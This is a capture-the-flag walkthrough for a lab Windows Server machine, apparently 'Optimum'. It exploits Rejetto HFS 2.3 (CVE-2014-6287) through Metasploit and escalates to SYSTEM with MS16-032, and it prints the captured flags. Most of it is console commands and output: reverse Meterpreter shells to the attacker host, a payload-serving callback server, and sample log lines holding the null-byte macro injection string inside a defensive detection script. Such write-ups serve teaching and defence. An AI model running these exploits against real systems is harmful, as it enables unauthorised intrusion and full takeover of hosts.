Optimum
Optimum is a Windows Server 2012 R2 machine running an outdated HTTP file server on port 80. The attack involves two stages - initial foothold through a well-known Remote Code Execution vulnerability in Rejetto HttpFileServer 2.3 (CVE-2014-6287), followed by a local privilege escalation using MS16-032 - a race condition in the Windows Secondary Logon service - to climb from a low-privilege user to NT AUTHORITY\SYSTEM.
Nmap → Port 80 (HFS 2.3)
→ searchsploit confirms CVE-2014-6287 (RCE)
→ MSF rejetto_hfs_exec
→ Null byte injection → HFS macro RCE
→ Meterpreter shell as OPTIMUM\kostas
→ user.txt (kostas\Desktop)
→ sysinfo: Server 2012 R2 x64, session x86
→ MS16-032 (secondary logon race condition)
→ Token impersonation → SYSTEM
→ root.txt (Administrator\Desktop)
Reconnaissance
Full port scan with service detection:
Nmap scan report for 10.129.16.230
Host is up, received echo-reply ttl 127 (0.17s latency).
Scanned at 2026-06-12 14:50:15 EAT for 389s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 HttpFileServer httpd 2.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: HFS /
|_http-server-header: HFS 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Only a single port open - port 80 running Rejetto HttpFileServer (HFS) 2.3. HFS is a lightweight personal file-sharing application typically used for quick file transfers.
Visiting http://10.129.16.230 in the browser confirms an empty HFS instance. The web UI leaks additional detail in the Server information panel: version HttpFileServer 2.3 and server uptime. No credentials are required to browse the interface - it’s wide open with anonymous access.
This version number is a critical detail. Check public exploits:
➜ searchsploit HttpFileServer
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py
------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
You get a single hit and it’s an RCE. HFS 2.3 is vulnerable to CVE-2014-6287, a null byte injection flaw in the search macro functionality that allows unauthenticated command execution through a crafted HTTP request.
Foothold - CVE-2014-6287 (Rejetto HFS RCE)
Load the Metasploit module:
msf > search HttpFileServer
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/rejetto_hfs_exec
msf > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) > options
Module options (exploit/windows/http/rejetto_hfs_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 no Seconds to wait before terminating web server
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SRVSSL false no Negotiate SSL/TLS for local server connections
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The path of the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.2.118 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
Before configuring, take note of the module options. Unlike typical HTTP exploits, this module spins up a local HTTP server (SRVPORT 8080) to serve the payload - the exploit works by injecting a macro into HFS that causes the server to make a callback to your machine and download the payload. It’s a two-stage delivery: the initial HTTP request triggers HFS to fetch your payload, which then executes.
msf exploit(windows/http/rejetto_hfs_exec) > setg RHOSTS 10.129.16.230
RHOSTS => 10.129.16.230
msf exploit(windows/http/rejetto_hfs_exec) > setg LHOST tun0
LHOST => tun0
msf exploit(windows/http/rejetto_hfs_exec) > check
[*] 10.129.16.230:80 - The service is running, but could not be validated.
msf exploit(windows/http/rejetto_hfs_exec) > exploit
[*] Started reverse TCP handler on 10.10.15.192:4444
[*] Using URL: http://10.10.15.192:8080/icTmyHUu
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /icTmyHUu
[*] Sending stage (199238 bytes) to 10.129.16.230
[!] Tried to delete %TEMP%\kEeZkjfapPPOsL.vbs, unknown result
[*] Meterpreter session 1 opened (10.10.15.192:4444 -> 10.129.16.230:49162) at 2026-06-12 15:09:48 +0300
[*] Server stopped.
The exploit flow is as follows:
malicious request hits HFS
--> HFS macro evaluates the injected command
--> HFS fetches the payload from your local HTTP server
--> payload executes
--> Meterpreter callback.
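From the defender's side, the two markers of the null-byte-in-search-macro request described above are easy to hunt for in web logs. The following Python is an added example, not part of the original writeup or of HFS: it scans constructed access-log lines (in a combined-log-like format; HFS's own log template differs, so LINE_RE is an assumption to adapt) for a null byte in the request target, including a double-encoded one, and for HFS macro syntax `{. ... .}`.

```python
"""Spot CVE-2014-6287-style requests in HFS access logs (added defensive example)."""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample log in a common-log-like format (HFS's real log format differs;
# adjust LINE_RE to whatever your reverse proxy or HFS log template produces).
SAMPLE_LOG = """\
10.10.14.5 - - [12/Jun/2026:14:55:01 +0300] "GET / HTTP/1.1" 200 1843
10.10.14.5 - - [12/Jun/2026:14:55:07 +0300] "GET /?search=quarterly HTTP/1.1" 200 512
10.10.14.5 - - [12/Jun/2026:14:55:09 +0300] "GET /?search=%00{.exec|cmd.exe.} HTTP/1.1" 200 0
10.10.14.5 - - [12/Jun/2026:14:55:11 +0300] "GET /?search=%2500{.exec|cmd.exe.} HTTP/1.1" 200 0
10.10.14.5 - - [12/Jun/2026:14:55:12 +0300] "GET /a%00b HTTP/1.1" 404 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# HFS macros are delimited by "{." and ".}"; a benign search term never contains them.
MACRO_RE = re.compile(r"\{\..*?\.\}", re.DOTALL)


def analyze_request(target: str) -> List[str]:
    """Return the reasons a single request target looks like a CVE-2014-6287 attempt."""
    decoded = target
    for _ in range(2):  # peel up to two layers of percent-encoding (%2500 -> %00 -> NUL)
        decoded = unquote(decoded)
    reasons = []
    if "\x00" in decoded:
        reasons.append("null byte in request target")
    if MACRO_RE.search(decoded):
        reasons.append("HFS macro syntax in request target")
    return reasons


def scan_log(text: str) -> List[Dict[str, object]]:
    """Parse each log line and collect the ones that trip analyze_request()."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than abort the whole scan
        reasons = analyze_request(m["target"])
        if reasons:
            hits.append({"ip": m["ip"], "time": m["ts"], "target": m["target"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["target"]}: {", ".join(hit["reasons"])}')
```

A hit on an HFS instance that is still on 2.3 is a strong signal; the only real fix is to take HFS 2.3 off the network or upgrade it.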
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter > pwd
C:\Users\kostas\Desktop
meterpreter > ls
Listing: C:\Users\kostas\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2026-06-19 00:07:53 +0300 %TEMP%
100666/rw-rw-rw- 282 fil 2017-03-18 14:57:16 +0300 desktop.ini
100777/rwxrwxrwx 760320 fil 2017-03-18 15:11:17 +0300 hfs.exe
100444/r--r--r-- 34 fil 2026-06-18 23:47:31 +0300 user.txt
meterpreter > cat user.txt
ac2c621c8a1a02501b1729a83df82070
We’re in, but only as a standard user account (OPTIMUM\kostas).
Privilege Escalation - MS16-032
Before blindly throwing exploits at the box, enumerate the environment:
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows Server 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 2
Meterpreter : x86/windows
Two critical details jump out here.
- First, the OS is Windows Server 2012 R2 Build 9600 - a version with a well-known catalogue of local privesc vulnerabilities if unpatched.
- Second, and importantly: the Meterpreter session is x86 (32-bit) running on a 64-bit OS. This architecture mismatch matters as some exploits and post-exploitation modules will behave unexpectedly or fail outright in this configuration.
The MS16-032 module handles this gracefully by using SysWOW64 PowerShell, but it’s worth flagging.
Background the session and search for local privilege escalation modules:
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/http/rejetto_hfs_exec) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows OPTIMUM\kostas @ OPTIMUM 10.10.15.192:4444 -> 10.129.16.230:49162 (10.129.16.230)
msf exploit(windows/http/rejetto_hfs_exec) > search exploit/windows/local
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
//// REDACTED ///
45 exploit/windows/local/ms16_032_secondary_logon_handle_privesc 2016-03-21 normal Yes MS16-032 Secondary Logon Handle Privilege Escalation
From the list, ms16_032_secondary_logon_handle_privesc stands out as a strong candidate for Server 2012 R2. MS16-032 is a race condition vulnerability in the Windows Secondary Logon Service (seclogon). Under concurrent calls to CreateProcessWithLogonW, seclogon can leak a handle to a thread that is impersonating SYSTEM; an attacker who wins the race can duplicate that handle and steal the SYSTEM-level impersonation token. Microsoft patched it in March 2016. Any unpatched 2012 R2 system is likely vulnerable.
msf exploit(windows/http/rejetto_hfs_exec) > use 45
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > options
Module options (exploit/windows/local/ms16_032_secondary_logon_handle_privesc):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x86
View the full module info with the info, or info -d command.
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 1
SESSION => 1
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > check
[+] Compressed size: 1160
[+] Deleted
[*] The service is running, but could not be validated.
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
Watch the exploit output - it’s verbose and shows what’s happening under the hood:
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run
[*] Started reverse TCP handler on 10.10.15.192:4444
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\VCmKZZXfY.ps1...
[*] Compressing script contents...
[+] Compressed size: 3828
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2540
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $fcq = [Ntdll]::NtImpersonateThread($qylV, $qylV, [ref]$g48)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (g48:VariablePath) [], Runtime
Exception
+ FullyQualifiedErrorId : NonExistingVariableReference
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $fcq = [Advapi32]::DuplicateToken($dq9, 2, [ref]$ce72)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
u00dmSpFEk0P9HHoC46S2CODrlFe7k6k
[+] Executed on target machine.
[*] Sending stage (199238 bytes) to 10.129.16.230
[*] Meterpreter session 2 opened (10.10.15.192:4444 -> 10.129.16.230:49163) at 2026-06-12 15:26:01 +0300
[+] Deleted C:\Users\kostas\AppData\Local\Temp\VCmKZZXfY.ps1
meterpreter >
The exploit writes a PowerShell script to the user’s temp directory, executes it, and races to duplicate a SYSTEM token before the handle is cleaned up. The PowerShell errors about NtImpersonateThread and DuplicateToken mid-output look alarming, but they’re part of the expected race condition behaviour - the exploit retries and ultimately wins. Session 2 opens.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
SYSTEM achieved. Navigate to the Administrator desktop for the root flag:
meterpreter > pwd
C:\Users
meterpreter > cat Administrator\\Desktop\\root.txt
2784db6250b7ab5742f4102db280ba98
meterpreter >